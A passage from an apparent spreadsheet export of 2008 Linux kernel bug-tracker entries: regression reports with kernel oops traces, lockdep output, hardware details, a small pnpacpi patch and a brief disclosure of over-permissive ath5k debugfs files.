with ordered data mode. JBD: barrier-based sync failed on md0:8 - disabling barriers kernel BUG at fs/ext4/mballoc.c:1240! pdflush[12068]: bugcheck! 0 [1] Modules linked in: ext4 jbd2 crc16 raid0 nfsd lockd nfs_acl auth_rpcgss exportfs autofs4 sunrpc ipmi_watchdog mptctl ipmi_devintf ipmi_si ipmi_msghandler vfat fat dm_mirror dm_region_hash dm_log dm_multipath dm_mod e100 mii rng_core iTCO_wdt iTCO_vendor_support lpfc tg3 scsi_transport_fc libphy button sg usb_storage shpchp mptspi mptscsih mptbase scsi_transport_spi sd_mod scsi_mod ext3 jbd mbcache uhci_hcd ohci_hcd ehci_hcd [last unloaded: ipmi_watchdog] Pid: 12068, CPU 0, comm: pdflush psr : 0000101008526030 ifs : 8000000000000814 ip : [&lt;a000000207dde590&gt;] Not tainted (2.6.28-rc3-git4) ip is at ext4_mb_use_best_found+0xd0/0xb00 [ext4] unat: 0000000000000000 pfs : 0000000000000814 rsc : 0000000000000003 rnat: 0000000000000000 bsps: 0000000000000000 pr : 0000000000001941 ldrs: 0000000000000000 ccv : 0000000000000000 fpsr: 0009804c8a70433f csd : 0000000000000000 ssd : 0000000000000000 b0 : a000000207dde590 b6 : a000000100039260 b7 : a00000010000bb00 f6 : 000000000000000000000 f7 : 1003e0000000000000020 f8 : 1003ee0000040878b0000 f9 : 1003e0000000000000000 f10 : 1003ee0000040a19c0000 f11 : 1003e0000000000000000 r1 : a000000100e24b80 r2 : a000000100bc5210 r3 : 0000000000004000 r8 : 0000000000000029 r9 : 0000000000000001 r10 : a000000100a50000 r11 : ffffffffffff0420 r12 : e00000005bfbfa40 r13 : e00000005bfb0000 r14 : a000000100bc5218 r15 : e00001200ac5fe18 r16 : ffffffffffff6fd0 r17 : a000000100c3f7c8 r18 : 000000000000000a r19 : 0000000000000026 r20 : 0000000000020000 r21 : a000000100c3cb78 r22 : a000000100c3cb74 r23 : a000000100c3cb88 r24 : a000000100c3f7a0 r25 : a000000100c2dba0 r26 : a000000100c3cb74 r27 : 0000001008522030 r28 : 0000000000000034 r29 : a0000001012ce0e3 r30 : 0000000000000000 r31 : a000000100bef7d8 Call Trace: [&lt;a000000100015ca0&gt;] show_stack+0x40/0xa0 sp=e00000005bfbf610 bsp=e00000005bfb1618 [&lt;a0000001000165b0&gt;] show_regs+0x850/0x8a0 sp=e00000005bfbf7e0 bsp=e00000005bfb15b8 [&lt;a000000100039970&gt;] die+0x1b0/0x2c0 sp=e00000005bfbf7e0 bsp=e00000005bfb1570 [&lt;a000000100039ad0&gt;] die_if_kernel+0x50/0x80 sp=e00000005bfbf7e0 bsp=e00000005bfb1540 [&lt;a00000010066a010&gt;] ia64_bad_break+0x230/0x460 sp=e00000005bfbf7e0 bsp=e00000005bfb1518 [&lt;a00000010000c300&gt;] ia64_native_leave_kernel+0x0/0x270 sp=e00000005bfbf870 bsp=e00000005bfb1518 [&lt;a000000207dde590&gt;] ext4_mb_use_best_found+0xd0/0xb00 [ext4] sp=e00000005bfbfa40 bsp=e00000005bfb1478 [&lt;a000000207ddf130&gt;] ext4_mb_check_limits+0x170/0x1a0 [ext4] sp=e00000005bfbfa50 bsp=e00000005bfb1440 [&lt;a000000207de8e90&gt;] ext4_mb_regular_allocator+0x1910/0x1f20 [ext4] sp=e00000005bfbfa70 bsp=e00000005bfb13a8 [&lt;a000000207dec6d0&gt;] ext4_mb_new_blocks+0x3b0/0x1400 [ext4] sp=e00000005bfbfad0 bsp=e00000005bfb1328 [&lt;a000000207dda050&gt;] ext4_ext_get_blocks+0x16d0/0x1b40 [ext4] sp=e00000005bfbfae0 bsp=e00000005bfb1248 [&lt;a000000207dae570&gt;] ext4_get_blocks_wrap+0x1d0/0x4c0 [ext4] sp=e00000005bfbfb50 bsp=e00000005bfb11d0 [&lt;a000000207db6c70&gt;] ext4_da_get_block_write+0xd0/0x300 [ext4] sp=e00000005bfbfb50 bsp=e00000005bfb1180 [&lt;a000000207dabc10&gt;] mpage_da_map_blocks+0xf0/0xce0 [ext4] sp=e00000005bfbfb50 bsp=e00000005bfb1118 [&lt;a000000207db4240&gt;] ext4_da_writepages+0x4a0/0x780 [ext4] sp=e00000005bfbfc40 bsp=e00000005bfb1088 [&lt;a000000100126c90&gt;] do_writepages+0xb0/0x120 sp=e00000005bfbfcf0 bsp=e00000005bfb1060 [&lt;a0000001001d1070&gt;] __writeback_single_inode+0x370/0x6e0 sp=e00000005bfbfcf0 bsp=e00000005bfb1018 [&lt;a0000001001d1cb0&gt;] generic_sync_sb_inodes+0x4b0/0x7a0 sp=e00000005bfbfd30 bsp=e00000005bfb0fc8 [&lt;a0000001001d1fd0&gt;] sync_sb_inodes+0x30/0x60 sp=e00000005bfbfd30 bsp=e00000005bfb0fa0 [&lt;a0000001001d28f0&gt;] writeback_inodes+0x130/0x260 sp=e00000005bfbfd30 bsp=e00000005bfb0f70 [&lt;a0000001001283a0&gt;] background_writeout+0x140/0x1e0 sp=e00000005bfbfd30 bsp=e00000005bfb0f38 [&lt;a000000100129460&gt;] pdflush+0x2e0/0x4e0 sp=e00000005bfbfd80 bsp=e00000005bfb0f18 [&lt;a0000001000b8ba0&gt;] kthread+0xa0/0x120 sp=e00000005bfbfe30 bsp=e00000005bfb0ee8 [&lt;a000000100014430&gt;] kernel_thread_helper+0x30/0x60 sp=e00000005bfbfe30 bsp=e00000005bfb0ec0 [&lt;a00000010000a0c0&gt;] start_kernel_thread+0x20/0x40 sp=e00000005bfbfe30 bsp=e00000005bfb0ec0</t>
  </si>
  <si>
    <t>Major increase in the number of wakeups from C3</t>
  </si>
  <si>
    <t>2008-11-13 07:02 UTC</t>
  </si>
  <si>
    <t>2008-11-17 15:39 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27.5 Earliest failing kernel version: 2.6.28-rc3 Distribution: Debian Sid Hardware Environment: Fujitsu-Siemens Lifebook E8110, Intel T2400, 1.5G RAM, GMA950, iwl3945 Software Environment: Gnome 2.22.3 Problem Description: The processor is woken up from C3 by "extra timer interrupt" around 100 times per second. In .27, under the same conditions, I am able to achieve approx 10 wakeups per second, therefore better C3 residency times. The testing was done with the RF kill switch ON. Steps to reproduce: run powertop, apply all hints.</t>
  </si>
  <si>
    <t>Fn + brightness up/down keys doesn't work if ACPI enabled - Samsung NC10</t>
  </si>
  <si>
    <t>2.6.27-8-generic</t>
  </si>
  <si>
    <t>2008-11-13 10:35 UTC</t>
  </si>
  <si>
    <t>Alain Tavan</t>
  </si>
  <si>
    <t>Latest working kernel version: don't know i have the netbook since 1 week Earliest failing kernel version: 2.6.27-8-generic Distribution: Ubuntu 8.10 Hardware Environment: Samsung NC10 netbook lspci : 00:00.0 Host bridge: Intel Corporation Mobile 945GME Express Memory Controller Hub (rev 03) 00:02.0 VGA compatible controller: Intel Corporation Mobile 945GME Express Integrated Graphics Controller (rev 03) 00:02.1 Display controller: Intel Corporation Mobile 945GM/GMS/GME, 943/940GML Express Integrated Graphics Controller (rev 03) 00:1b.0 Audio device: Intel Corporation 82801G (ICH7 Family) High Definition Audio Controller (rev 02) 00:1c.0 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 1 (rev 02) 00:1c.2 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 3 (rev 02) 00:1d.0 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #1 (rev 02) 00:1d.1 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #2 (rev 02) 00:1d.2 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #3 (rev 02) 00:1d.3 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #4 (rev 02) 00:1d.7 USB Controller: Intel Corporation 82801G (ICH7 Family) USB2 EHCI Controller (rev 02) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev e2) 00:1f.0 ISA bridge: Intel Corporation 82801GBM (ICH7-M) LPC Interface Bridge (rev 02) 00:1f.2 IDE interface: Intel Corporation 82801GBM/GHM (ICH7 Family) SATA IDE Controller (rev 02) 00:1f.3 SMBus: Intel Corporation 82801G (ICH7 Family) SMBus Controller (rev 02) 02:00.0 Ethernet controller: Atheros Communications Inc. AR242x 802.11abg Wireless PCI Express Adapter (rev 01) 03:00.0 Ethernet controller: Marvell Technology Group Ltd. 88E8040 PCI-E Fast Ethernet Controller (rev 13) Software Environment: Problem Description: On this laptop some function keys are BIOS-controlled (they work before Linux boots). As soon as Linux boots they stop working. Trying some boot options I've found that "acpi=off" makes them work after checking dmesg and /usr/include/linux/input.h i fixed them with setkeycodes e008 225 setkeycodes e009 224 BUT, in graphical mode it makes the keyboard freeze (i need to switch to CRTL + ALT + F1 and then CTRL + ALT +F7 to make it unfreeze) AND it brings down the brightness at 0% or brings up the brithness at 100% it did not stop, even if i'm no more pressing the key because it is a netbook i can't loose acpi (i can't see the batterie status) and the processor is at 100% speed not very good to spare batterie life I killed acpid and try a "cat /proc/acpi/event" but it didn't show anything after pressing the brightness button the directory /sys/class/backlight is empty</t>
  </si>
  <si>
    <t>DRM enabled kernel hangs hard on resume (Intel graphics)</t>
  </si>
  <si>
    <t>2008-11-14 16:20 UTC</t>
  </si>
  <si>
    <t>2008-12-07 14:00 UTC</t>
  </si>
  <si>
    <t>Subject : Re: Suspend to disk broken in latest 2.6.28-rc3 Submitter : Jens Axboe &lt;jens.axboe@oracle.com&gt; Date : 2008-11-12 18:42 References : http://marc.info/?l=linux-kernel&amp;m=122651551216820&amp;w=4 Handled-By : Jesse Barnes &lt;jbarnes@virtuousgeek.org&gt; This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>thinkpad x200 X.server not work with gm4500 graphics</t>
  </si>
  <si>
    <t>2008-11-14 16:44 UTC</t>
  </si>
  <si>
    <t>2008-11-16 03:56 UTC</t>
  </si>
  <si>
    <t>Subject : thinkpad x200 X.server not work with gm4500 graphics Submitter : arrow.ebd@gmail.com Date : 2008-11-10 15:25 References : http://marc.info/?l=linux-kernel&amp;m=122633081027413&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>snd-hda-intel on Realtek ALC268 chip shows only Master volume (for playback)</t>
  </si>
  <si>
    <t>2008-11-15 04:20 UTC</t>
  </si>
  <si>
    <t>2008-12-13 10:18 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27.4 Earliest failing kernel version: Distribution: Gentoo Hardware Environment: acer aspire one 110, ALC268 chip Software Environment: Problem Description: Many controls disappeared! Steps to reproduce: make oldconfig, install kernel and modules, reboot and then alsamixer shows only master control for playback, no Headphone, Front Front mic, Beep, and PCM</t>
  </si>
  <si>
    <t>Suspend regression in stable kernel 2.6.27.4 on Mac mini Core Duo</t>
  </si>
  <si>
    <t>2.6.28-rc3, 2.6.27.4</t>
  </si>
  <si>
    <t>2008-11-15 14:49 UTC</t>
  </si>
  <si>
    <t>2008-11-30 15:14 UTC</t>
  </si>
  <si>
    <t>Subject : Suspend regression in stable kernel 2.6.27.4 on Mac mini Core Duo Submitter : Tino Keitel &lt;tino.keitel@gmx.de&gt; Date : 2008-11-09 20:28 References : http://marc.info/?l=linux-kernel&amp;m=122626258429689&amp;w=4 Handled-By : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=122661443120581&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.28-rc4 mem_cgroup_charge_common panic</t>
  </si>
  <si>
    <t>2.6.28-rc4</t>
  </si>
  <si>
    <t>2008-11-15 15:32 UTC</t>
  </si>
  <si>
    <t>KAMEZAWA Hiroyuki</t>
  </si>
  <si>
    <t>Subject : 2.6.28-rc4 mem_cgroup_charge_common panic Submitter : Badari Pulavarty &lt;pbadari@us.ibm.com&gt; Date : 2008-11-10 21:43 References : http://marc.info/?l=linux-kernel&amp;m=122635343008147&amp;w=4 Handled-By : KAMEZAWA Hiroyuki &lt;kamezawa.hiroyu@jp.fujitsu.com&gt; This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>USB hid blocks USB port in 2.6.28rc3</t>
  </si>
  <si>
    <t>2008-11-15 15:52 UTC</t>
  </si>
  <si>
    <t>2008-11-16 11:20 UTC</t>
  </si>
  <si>
    <t>Subject : USB hid blocks USB port in 2.6.28rc3 Submitter : Andi Kleen &lt;andi@firstfloor.org&gt; Date : 2008-11-11 0:31 References : http://marc.info/?l=linux-usb&amp;m=122636246522848&amp;w=4 Handled-By : Alan Stern &lt;stern@rowland.harvard.edu&gt; Handled-By : Jiri Slaby &lt;jirislaby@gmail.com&gt; Notify-Also : Jiri Kosina &lt;jkosina@suse.cz&gt; This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.27.6</t>
  </si>
  <si>
    <t>circular locking dependency detected [ by iwlgan, on thinkpad x200]</t>
  </si>
  <si>
    <t>2.6.28-rc5</t>
  </si>
  <si>
    <t>2008-11-16 06:16 UTC</t>
  </si>
  <si>
    <t>2008-11-22 13:44 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: v2.6.27.5 Distribution: archlinux Hardware Environment: thinkpad x200 Problem Description: when I do "ifconfig wlan0 down" just after system startup. ======================================================= [ INFO: possible circular locking dependency detected ] 2.6.28-rc5 #17 ------------------------------------------------------- ifconfig/3218 is trying to acquire lock: (iwlagn){--..}, at: [&lt;c023599a&gt;] flush_workqueue+0x0/0x74 but task is already holding lock: (rtnl_mutex){--..}, at: [&lt;c0456b5c&gt;] rtnl_lock+0xf/0x11 which lock already depends on the new lock. the existing dependency chain (in reverse order) is: -&gt; #2 (rtnl_mutex){--..}: [&lt;c0246391&gt;] __lock_acquire+0xf20/0x11e7 [&lt;c02466b3&gt;] lock_acquire+0x5b/0x81 [&lt;c0510c23&gt;] mutex_lock_nested+0xc5/0x24a [&lt;c0456b5c&gt;] rtnl_lock+0xf/0x11 [&lt;c04f5638&gt;] ieee80211_notify_mac+0x10/0x49 [&lt;f885a72b&gt;] iwl_bg_alive_start+0x38c/0x3d9 [iwlagn] [&lt;c0235247&gt;] run_workqueue+0xd6/0x1a4 [&lt;c02353cb&gt;] worker_thread+0xb6/0xc2 [&lt;c02381d9&gt;] kthread+0x3b/0x61 [&lt;c020491b&gt;] kernel_thread_helper+0x7/0x10 [&lt;ffffffff&gt;] 0xffffffff -&gt; #1 (&amp;(&amp;priv-&gt;alive_start)-&gt;work){--..}: [&lt;c0246391&gt;] __lock_acquire+0xf20/0x11e7 [&lt;c02466b3&gt;] lock_acquire+0x5b/0x81 [&lt;c0235241&gt;] run_workqueue+0xd0/0x1a4 [&lt;c02353cb&gt;] worker_thread+0xb6/0xc2 [&lt;c02381d9&gt;] kthread+0x3b/0x61 [&lt;c020491b&gt;] kernel_thread_helper+0x7/0x10 [&lt;ffffffff&gt;] 0xffffffff -&gt; #0 (iwlagn){--..}: [&lt;c0246128&gt;] __lock_acquire+0xcb7/0x11e7 [&lt;c02466b3&gt;] lock_acquire+0x5b/0x81 [&lt;c02359d1&gt;] flush_workqueue+0x37/0x74 [&lt;f8854cd0&gt;] iwl4965_mac_stop+0xeb/0x1a8 [iwlagn] [&lt;c04f8907&gt;] ieee80211_stop+0x3a5/0x3ee [&lt;c044f536&gt;] dev_close+0x67/0x86 [&lt;c044f260&gt;] dev_change_flags+0xa2/0x157 [&lt;c0497805&gt;] devinet_ioctl+0x21a/0x515 [&lt;c0498698&gt;] inet_ioctl+0x8e/0xa7 [&lt;c044397e&gt;] sock_ioctl+0x1bd/0x1e1 [&lt;c02955af&gt;] vfs_ioctl+0x22/0x69 [&lt;c0295995&gt;] do_vfs_ioctl+0x39f/0x3d0 [&lt;c02959f2&gt;] sys_ioctl+0x2c/0x45 [&lt;c0203a4b&gt;] sysenter_do_call+0x12/0x3f [&lt;ffffffff&gt;] 0xffffffff other info that might help us debug this: 1 lock held by ifconfig/3218: #0: (rtnl_mutex){--..}, at: [&lt;c0456b5c&gt;] rtnl_lock+0xf/0x11 stack backtrace: Pid: 3218, comm: ifconfig Not tainted 2.6.28-rc5 #17 Call Trace: [&lt;c050f88f&gt;] ? printk+0xf/0x11 [&lt;c024516a&gt;] print_circular_bug_tail+0x94/0x9f [&lt;c0246128&gt;] __lock_acquire+0xcb7/0x11e7 [&lt;c05121c4&gt;] ? _spin_unlock_irqrestore+0x40/0x50 [&lt;c02466b3&gt;] lock_acquire+0x5b/0x81 [&lt;c023599a&gt;] ? flush_workqueue+0x0/0x74 [&lt;c02359d1&gt;] flush_workqueue+0x37/0x74 [&lt;c023599a&gt;] ? flush_workqueue+0x0/0x74 [&lt;f8854cd0&gt;] iwl4965_mac_stop+0xeb/0x1a8 [iwlagn] [&lt;c04f8907&gt;] ieee80211_stop+0x3a5/0x3ee [&lt;c044f536&gt;] dev_close+0x67/0x86 [&lt;c044f260&gt;] dev_change_flags+0xa2/0x157 [&lt;c0497805&gt;] devinet_ioctl+0x21a/0x515 [&lt;c0498698&gt;] inet_ioctl+0x8e/0xa7 [&lt;c044397e&gt;] sock_ioctl+0x1bd/0x1e1 [&lt;c04437c1&gt;] ? sock_ioctl+0x0/0x1e1 [&lt;c02955af&gt;] vfs_ioctl+0x22/0x69 [&lt;c0295995&gt;] do_vfs_ioctl+0x39f/0x3d0 [&lt;c0342815&gt;] ? _raw_spin_unlock+0x74/0x78 [&lt;c05121f1&gt;] ? _spin_unlock+0x1d/0x20 [&lt;c022e20e&gt;] ? cap_set_effective+0x43/0x4d [&lt;c028a5ec&gt;] ? sys_faccessat+0x169/0x173 [&lt;c0203a87&gt;] ? sysenter_exit+0xf/0x1a [&lt;c02959f2&gt;] sys_ioctl+0x2c/0x45 [&lt;c0203a4b&gt;] sysenter_do_call+0x12/0x3f iwlagn: Intel(R) Wireless WiFi Link AGN driver for Linux, 1.3.27kds iwlagn: Copyright(c) 2003-2008 Intel Corporation iwlagn 0000:03:00.0: PCI INT A -&gt; GSI 17 (level, low) -&gt; IRQ 17 iwlagn 0000:03:00.0: setting latency timer to 64 iwlagn: Detected Intel Wireless WiFi Link 5100AGN REV=0x54 iwlagn: Tunable channels: 13 802.11bg, 24 802.11a channels phy2: Selected rate control algorithm 'iwl-agn-rs' iwlagn 0000:03:00.0: PCI INT A -&gt; GSI 17 (level, low) -&gt; IRQ 17 iwlagn 0000:03:00.0: irq 43 for MSI/MSI-X iwlagn 0000:03:00.0: firmware: requesting iwlwifi-5000-1.ucode Registered led device: iwl-phy2:radio Registered led device: iwl-phy2:assoc Registered led device: iwl-phy2:RX Registered led device: iwl-phy2:TX ADDRCONF(NETDEV_UP): wlan0: link is not ready</t>
  </si>
  <si>
    <t>acpi_platform-drivers@kernel-bugs.osdl.org</t>
  </si>
  <si>
    <t>Regression in bonding between 2.6.26.8 and 2.6.27.6</t>
  </si>
  <si>
    <t>2008-11-16 08:47 UTC</t>
  </si>
  <si>
    <t>2009-01-11 05:13 UTC</t>
  </si>
  <si>
    <t>Subject : Regression in bonding between 2.6.26.8 and 2.6.27.6 Submitter : Jesper Krogh &lt;jesper@krogh.cc&gt; Date : 2008-11-16 9:41 References : http://marc.info/?l=linux-kernel&amp;m=122682977001048&amp;w=4 This entry is being used for tracking a regression from 2.6.26. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Oops in acpi_system_wakeup_device_seq_show</t>
  </si>
  <si>
    <t>2008-11-16 08:51 UTC</t>
  </si>
  <si>
    <t>2008-11-16 11:19 UTC</t>
  </si>
  <si>
    <t>Subject : Re: Linux 2.6.28-rc5 Submitter : Bruno Prémont &lt;bonbons@linux-vserver.org&gt; Date : 2008-11-16 13:04 References : http://marc.info/?l=linux-kernel&amp;m=122684070215520&amp;w=4 Notify-Also : Frans Pop &lt;elendil@planet.nl&gt; This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Module r8169 fails to build</t>
  </si>
  <si>
    <t>2008-11-16 14:48 UTC</t>
  </si>
  <si>
    <t>2008-11-19 13:23 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27.5 Earliest failing kernel version: 2.6.27.6 Distribution: Gentoo Hardware Environment: x86 (Intel Core 2 Duo, ICH8 chipset) Software Environment: GNU Problem Description: Module r8169 fails to build. Steps to reproduce: - Copy the (working) .config from 2.6.27.5 into the 2.6.27.6 build dir - make oldconfig - make -j3 ERROR: "mii_ethtool_gset" [drivers/net/r8169.ko] undefined! make[1]: *** [__modpost] Error 1 make: *** [modules] Error 2 make: *** Waiting for unfinished jobs.... As far as I can tell, this is because in 2.6.27.6 the r8169 module is now using the mii_ functions, but is not make dependent on MII. If I manually change the configuration to set MII=y or MII=m, it builds fine.</t>
  </si>
  <si>
    <t>the serial device(ttyS0) is unuseable after booting the kernel</t>
  </si>
  <si>
    <t>2008-11-17 18:44 UTC</t>
  </si>
  <si>
    <t>Shan Wei</t>
  </si>
  <si>
    <t>2008-11-19 22:25 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.28-rc3 Earliest failing kernel version:2.6.28-rc1 Distribution: Hardware Environment:fujitsu's PG Software Environment: Problem Description: When i switch to the kernel of 2.6.28-rc3, the serial device (ttyS0) is unused. But on 2.6.27, it's ok. On 2.6.28-rc3: [root@DaVid compiler]# setserial /dev/ttyS0 /dev/ttyS0, UART: unknown, Port: 0x03f8, IRQ: 4 On 2.6.27: [root@DaVid compiler]# setserial /dev/ttyS0 /dev/ttyS0, UART: 16550A, Port: 0x03f8, IRQ: 4 The problem comes from this patch 39a0ad871000d2a016a4fa113a6e53d22aabf25d。 For the device that is not present but functional, it unload the driver for the device. In the following patch, I try to fix it whthout check the present bit when adding device. After applied the patch, the serial device is useable again. diff --git a/drivers/pnp/pnpacpi/core.c b/drivers/pnp/pnpacpi/core.c index 383e47c..bcc731b 100644 --- a/drivers/pnp/pnpacpi/core.c +++ b/drivers/pnp/pnpacpi/core.c @@ -154,7 +154,7 @@ static int __init pnpacpi_add_device(struct acpi_device *device) */ status = acpi_get_handle(device-&gt;handle, "_CRS", &amp;temp); if (ACPI_FAILURE(status) || !ispnpidacpi(acpi_device_hid(device)) || - is_exclusive_device(device) || (!device-&gt;status.present)) + is_exclusive_device(device)) return 0; dev = pnp_alloc_dev(&amp;pnpacpi_protocol, num, acpi_device_hid(device)); Steps to reproduce: 1)build the kernel of 2.6.28-rc3; 2)check the device with “setserial /dev/ttyS0”</t>
  </si>
  <si>
    <t>snd_hda_intel: power_save: sound cracks on powerdown</t>
  </si>
  <si>
    <t>2008-11-18 12:07 UTC</t>
  </si>
  <si>
    <t>2009-11-24 00:39 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27.6 Earliest failing kernel version: 2.6.28-rc? (I'm thinking that it works sometime ago with 2.6.28) Distribution: Gentoo Hardware Environment: Dell Latitude D830 Problem Description: If power_save is greater 0 the speakers make a cracking noise on powerdown after the specified timeout Steps to reproduce: load snd_hda_intel with power_save=5 Play a sound and wait 5 secs. --------------------------- # cat /proc/asound/cards 0 [Intel ]: HDA-Intel - HDA Intel HDA Intel at 0xf6adc000 irq 21 # cat /proc/asound/pcm 00-00: STAC92xx Analog : STAC92xx Analog : playback 1 : capture 2</t>
  </si>
  <si>
    <t>[regression] Measured 688 cycles TSC warp; marking TSC unstable</t>
  </si>
  <si>
    <t>2008-11-19 05:05 UTC</t>
  </si>
  <si>
    <t>2008-11-23 08:33 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.27 Distribution: Debian Hardware Environment: Intel desktop with D945GCZ mainboard; Pentium D 3.2GHz Software Environment: Debian Lenny Problem Description: With 2.6.27 I always had the TSC reported stable. With 2.6.28-rc5 I'm seeing the TSC being consistently marked unstable with a fairly low warp (680-720). I've not tested intermediate rc releases on this box.</t>
  </si>
  <si>
    <t>Kernel 2.6 fails to install / run on Marvell 6145 SATA Controller</t>
  </si>
  <si>
    <t>2008-11-21 04:33 UTC</t>
  </si>
  <si>
    <t>andrei</t>
  </si>
  <si>
    <t>2012-05-22 16:53 UTC</t>
  </si>
  <si>
    <t>*** Distribution: openSUSE *** Hardware Environment: Mainboard: Manufacturer : Intel Corporation (Intel) Product : 975X Bad Axe 2 Model : D975XBX2 Version : AAD53350-508 Serial Number : BQB2736000SD Support MP : Yes, 4 CPU(s) Version MPS : 1.4 Processor: Type : Intel Core 2 Quad Specification : Intel(R) Core(TM)2 Quad CPU Q6600 @ 2.40GHz Model Number : Q6600 Codename : Kentsfield Revision : G0 Technology : 0.065µ CPU ID : 6.F.B CPU IDEx : 6.F.B Microcode : MU06FBB6 Disk Controller : Marvell Semiconductor (Was: Galileo Technology Ltd) 6145 SATA2 Controller Mode : SATA AHCI : Yes IDE Legacy : Yes NCQ : Yes Port Multiplier : Yes IO Ports : 5 available on 5 Version : 1.00 Bandwidth : 3 GB/s Port #0 : ATA Device detected - (Generation 1) Port #1 : ATA Device detected - (Generation 2) Port #2 : ATA Device detected - (Generation 1) Port #3 : No Device Port #4 : No Device *** Problem Description: I had recently a problem with D975XBX2 Intel motherboard. Exactly speaking of disk controller "Marvell 6145 SATA2 Controller". There is a (pseudo) driver in the kernel for handling that controller, called pata_marvell; it claims the device, but do nothing. There is another driver in the kernel for handling that controller, called ahci; it claims the device, but does not work. I have some screenshots...</t>
  </si>
  <si>
    <t>Security issue in DebugFS part of ath5k</t>
  </si>
  <si>
    <t>2008-11-21 18:40 UTC</t>
  </si>
  <si>
    <t>Jérôme Poulin</t>
  </si>
  <si>
    <t>2008-12-01 15:12 UTC</t>
  </si>
  <si>
    <t>When DebugFS is activated in the kernel, some distro auto-mount it in /sys/kernel/debug and permissions to reset the card, set debug and other stuff are wide open to any users, reset being set 0222 allows anyone to reset the card anytime (and on my computer it crashes the whole thing.) I would suggest removing any write access to users for all the files created un ath5k/debug.c and even read permissions to user and group to be more secure.</t>
  </si>
  <si>
    <t>xen: pin correct PGD on suspend</t>
  </si>
  <si>
    <t>commit eefb47f6a1e855653d275cb90592a3587ea93a09</t>
  </si>
  <si>
    <t>2008-11-22 12:38 UTC</t>
  </si>
  <si>
    <t>2008-12-07 14:05 UTC</t>
  </si>
  <si>
    <t>Subject : xen: pin correct PGD on suspend Submitter : Ian Campbell &lt;Ian.Campbell@citrix.com&gt; Date : 2008-11-21 10:21 References : http://marc.info/?l=linux-kernel&amp;m=122726293324850&amp;w=4 Handled-By : Ian Campbell &lt;Ian.Campbell@citrix.com&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=122726293324850&amp;w=4 Notify-Also : Jeremy Fitzhardinge &lt;jeremy@goop.org&gt; This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>IRQ and MSI allocations broken without sparse irq</t>
  </si>
  <si>
    <t>commit 3235e936c0cc3589309280b6f59e5096779adae3</t>
  </si>
  <si>
    <t>2008-11-22 12:58 UTC</t>
  </si>
  <si>
    <t>2008-12-05 14:02 UTC</t>
  </si>
  <si>
    <t>Subject : Regression: Bisected, IRQ and MSI allocations screwed without sparse irq Submitter : Jesper Dangaard Brouer &lt;hawk@diku.dk&gt; Date : 2008-11-20 19:48 References : http://marc.info/?l=linux-kernel&amp;m=122721060501073&amp;w=4 Handled-By : Thomas Gleixner &lt;tglx@linutronix.de&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=122722773824802&amp;w=4 This entry is being used for tracking a regression from 2.6.27. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>rtl8180 wireless slow</t>
  </si>
  <si>
    <t>2008-11-22 16:06 UTC</t>
  </si>
  <si>
    <t>Fabio Almanacco</t>
  </si>
  <si>
    <t>2010-08-23 14:53 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.26 Earliest failing kernel version:2.6.27 Distribution:Arch Linux Hardware Environment:rtl8180 based device: http://www3.hardwareversand.de/articledetail.jsp?aid=10347&amp;agid=271 Software Environment: Problem Description: Starting from 2.6.27 (tried &gt; 2.6.27.5), lan networking is slow (tried ftp and samba transferring for benchmark) if I set iwconfig wlan0 rate auto,(or high bitrate) the connection is unstable and I get this: http://img122.imageshack.us/img122/751/schermata3it5.png with 2.6.26 and rate auto (or also 54M) I get the max speed. If I set a slower rate (24M, 18M or 11) the connection is stable but the speed is slow. The biggest speed I reached with 2.6.27 is 800KB/s With 2.6.26 I get almost all the time &gt; 1.5MB/s. Anyone has the same problem? Gonna try with a different distro soon (ubuntu)</t>
  </si>
  <si>
    <t>[drivers/net/cxgb3/sge.c:563]: Possible memory leak: s</t>
  </si>
  <si>
    <t>2008-11-22 21:11 UTC</t>
  </si>
  <si>
    <t>2009-03-23 10:20 UTC</t>
  </si>
  <si>
    <t>There will be a memory leak in the function alloc_ring when the parameter sw_size is nonzero and metadata is NULL. I don't know if that can happen. Here is the code, taken from the latest git tree. static void *alloc_ring(struct pci_dev *pdev, size_t nelem, size_t elem_size, size_t sw_size, dma_addr_t * phys, void *metadata) { size_t len = nelem * elem_size; void *s = NULL; void *p = dma_alloc_coherent(&amp;pdev-&gt;dev, len, phys, GFP_KERNEL); if (!p) return NULL; if (sw_size) { s = kcalloc(nelem, sw_size, GFP_KERNEL); if (!s) { dma_free_coherent(&amp;pdev-&gt;dev, len, p, *phys); return NULL; } } if (metadata) *(void **)metadata = s; memset(p, 0, len); return p; }</t>
  </si>
  <si>
    <t>vcs sysfs file creation race</t>
